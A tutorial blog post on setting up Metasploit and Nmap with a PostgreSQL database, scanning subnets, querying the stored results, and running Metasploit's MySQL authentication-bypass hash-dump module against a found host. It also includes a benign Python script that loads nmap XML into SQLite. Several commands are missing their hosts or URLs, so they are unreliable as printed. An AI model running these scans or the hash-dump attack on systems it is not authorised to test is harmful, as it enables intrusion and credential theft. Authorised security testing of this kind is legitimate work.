
You Don’t Need a Vulnerability Scanner, Use Nmap & Metasploit

This article walks you through installing, configuring and running scans with Metasploit and Nmap. Both CentOS 7 and Ubuntu 20.04 are covered. The objective is to run nmap scans and have the results land in a database so they can be filtered later, and then use Metasploit to exploit based on the exposed services found on the discovered hosts. This article is based on details from several places including:

Install Postgres and some other tools we generally use:

CentOS:

yum install postgresql postgresql-server nmap curl wget tcpdump

Ubuntu:

apt install postgresql postgresql-contrib nmap curl wget tcpdump

Install Metasploit:

curl > msfinstall && \
  chmod 755 msfinstall && \

Run the initial DB setup (CentOS only; the Ubuntu package initialises the cluster during installation). This also creates some directories we need:

postgresql-setup initdb

Update your configuration file. For my system, only the lines indicated below were needed in the file. All other lines were removed. Take a backup of the file before removing anything:

CentOS: /var/lib/pgsql/data/pg_hba.conf
Ubuntu: /etc/postgresql/12/main/pg_hba.conf


host    msf_database    msf_user            md5


local   all             postgres                                peer
local   all             all                                     peer
host    all             all               md5
host    msf_database    msf_user            md5

The remainder of this article should be the same on both CentOS and Ubuntu.

Enable and start the DB:

systemctl enable postgresql
systemctl restart postgresql

Create the DB and user:

su postgres
createuser msf_user -P
createdb --owner=msf_user msf_database
Ignore directory permission errors (running su from a directory the postgres user cannot read, such as /root, prints a "could not change directory" warning that is harmless).

Install Metasploit:

curl > msfinstall

TIP: Metasploit will be installed to “/opt/metasploit-framework/”. The “bin” directory is “/opt/metasploit-framework/bin”.

Create the file “/opt/metasploit-framework/embedded/framework/config/database.yml” and add the following content. Metasploit reads the block keyed by its environment name, which is “production” for msfconsole, so the settings sit under that key. Change the password to whatever you set in the above steps:

# msfconsole runs in the "production" environment, so the connection
# settings must be nested under this key.
production:
  adapter: "postgresql"
  database: "msf_database"
  username: "msf_user"
  password: "MYPASSWORD"
  port: 5432
  host: "localhost"
  pool: 256
  timeout: 5

Run Metasploit and see if you can connect to the database:

db_connect msf_user:MYPASSWORD@

Create a workspace and switch to it:

# workspace -a TestWork
# workspace TestWork

And conduct a scan of your target subnet:

# db_nmap -sV -p 80,443

host           port  proto  name       state     info
----           ----  -----  ----       -----     ----
               443   tcp    ssl/https  open      VMware ESXi SOAP API 6.5.0
               443   tcp    ssl/http   open      Microsoft IIS httpd 10.0
               443   tcp    ssl/http   open      Apache httpd Express

TIP: The -sV tells nmap to probe the services listening on open ports for more detail, i.e. product names and version numbers.

The above scan is saved to the DB. Now we can sort through the results using basic queries. For example, get all hosts with port 443 or 3306 open:

# services -p 443,3306 -u

host           port  proto  name       state     info
----           ----  -----  ----       -----     ----
               443   tcp    ssl/http   open      Apache httpd 2.4
               443   tcp    ssl/http   open      Apache httpd 2.4
               443   tcp    ssl/http   open      Apache httpd Express
               443   tcp    ssl/http   open      Apache httpd Express
               443   tcp    ssl/http   open      Apache httpd Express
               3306  tcp    mysql      open      MySQL 5.5.5-10.3.28-MariaDB

TIP: The -p option takes a comma-separated list of port numbers. The -u option shows only hosts on which the given ports are open.
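The same scan-to-database-to-query workflow can be reproduced outside Metasploit, which is useful when the scan results are consumed by an asset inventory or a detection pipeline rather than by msfconsole. The following is an added example, not code from the original article or from the Metasploit project: it parses nmap's XML output (`nmap -oX`), loads one row per scanned port into an SQLite table with the same columns as the `services` view above, and answers the question “which hosts have 443 or 3306 open?” with a plain SQL query. The embedded XML is a constructed sample using RFC 5737 documentation addresses, not a real scan.

```python
"""Load nmap -oX output into SQLite and query it like Metasploit's `services -p ... -u`."""
import sqlite3
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX -` output (not a real scan).
# Hosts use the 192.0.2.0/24 documentation range.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 80,443,3306 -oX - 192.0.2.0/29">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd" version="2.4"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="http" product="Apache httpd" version="2.4" tunnel="ssl"/></port>
      <port protocol="tcp" portid="3306"><state state="closed"/><service name="mysql"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql" product="MariaDB" version="10.3.28"/></port>
      <port protocol="tcp" portid="443"><state state="filtered"/><service name="https"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Microsoft IIS httpd" version="10.0"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Same columns as the msfconsole `services` view: host, port, proto, name, state, info.
SCHEMA = """
CREATE TABLE IF NOT EXISTS services (
    host  TEXT    NOT NULL,
    port  INTEGER NOT NULL,
    proto TEXT    NOT NULL,
    name  TEXT,
    state TEXT    NOT NULL,
    info  TEXT,
    PRIMARY KEY (host, port, proto)
);
"""


def parse_nmap_xml(xml_text):
    """Yield one (host, port, proto, name, state, info) tuple per <port> element."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue  # skip hosts without an IPv4 address (e.g. MAC-only entries)
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state").get("state")
            svc = port.find("service")
            name = info = None
            if svc is not None:
                name = svc.get("name")
                if svc.get("tunnel") == "ssl":
                    name = "ssl/" + name  # nmap reports "ssl/http" the way the article's output shows it
                info = " ".join(v for v in (svc.get("product"), svc.get("version")) if v) or None
            yield (addr, int(port.get("portid")), port.get("protocol"), name, state, info)


def load_scan(conn, xml_text):
    """Insert a parsed scan into the services table; returns the number of rows loaded."""
    conn.executescript(SCHEMA)
    rows = list(parse_nmap_xml(xml_text))
    # INSERT OR REPLACE so a rescan of the same host/port refreshes state and version info.
    conn.executemany("INSERT OR REPLACE INTO services VALUES (?, ?, ?, ?, ?, ?)", rows)
    conn.commit()
    return len(rows)


def hosts_with_open_ports(conn, ports):
    """Equivalent of `services -p <ports> -u`: distinct hosts with any listed port open."""
    placeholders = ",".join("?" * len(ports))  # only "?" markers are interpolated; values are bound
    cur = conn.execute(
        "SELECT DISTINCT host FROM services WHERE state = 'open' "
        f"AND port IN ({placeholders}) ORDER BY host",
        [int(p) for p in ports],
    )
    return [row[0] for row in cur]


def query_open_hosts(xml_text, ports):
    """Convenience wrapper: parse, load into an in-memory DB and run the query in one call."""
    conn = sqlite3.connect(":memory:")
    load_scan(conn, xml_text)
    return hosts_with_open_ports(conn, ports)


if __name__ == "__main__":
    for h in query_open_hosts(SAMPLE_NMAP_XML, [443, 3306]):
        print(h)
```

Point the script at a real file with `nmap -sV -oX scan.xml <subnet>` and `ET.parse("scan.xml").getroot()` in place of `ET.fromstring`; swapping `sqlite3.connect(":memory:")` for a file path keeps the results between scheduled runs so that a newly opened port shows up as a diff against the previous scan.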

Now we can search for exploits that match our targets. In this example, we’ll focus on exploits relating to “mysql” with a rank of “excellent”:

# search rank:excellent mysql

Actually conducting an exploit attempt:

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name      Current Setting                                     Required  Description
----      ---------------                                     --------  -----------
RHOSTS    file:/tmp/msf-db-rhosts-20210824-1501072-r8icdz     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     3306                                                yes       The target port (TCP)
THREADS   1                                                   yes       The number of concurrent threads (max one per host)
USERNAME  root                                                yes       The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhost
rhost =>
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

[+] - The server allows logins, proceeding with bypass test
[*] - Authentication bypass is 10% complete
[*] - Authentication bypass is 20% complete
[*] - Authentication bypass is 30% complete
[*] - Authentication bypass is 90% complete
[*] - Authentication bypass is 100% complete
[-] - Unable to bypass authentication, this target may not be vulnerable
[*] - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I suppose it’s good that the test server was not successfully exploited.

You can run your scans in the background on a schedule using the following example command. Put it into a script or cron job for scheduling:

# nohup msfconsole -x "db_connect msf_user:MYPASSWORD@" -x "db_nmap -A" &

Check on the progress by running:

tail -f nohup.out


If you have trouble, it is most likely the database. You can tell whether Metasploit or the DB configuration is the problem by connecting directly with the psql CLI command:

psql -h -U msf_user --password -d msf_database
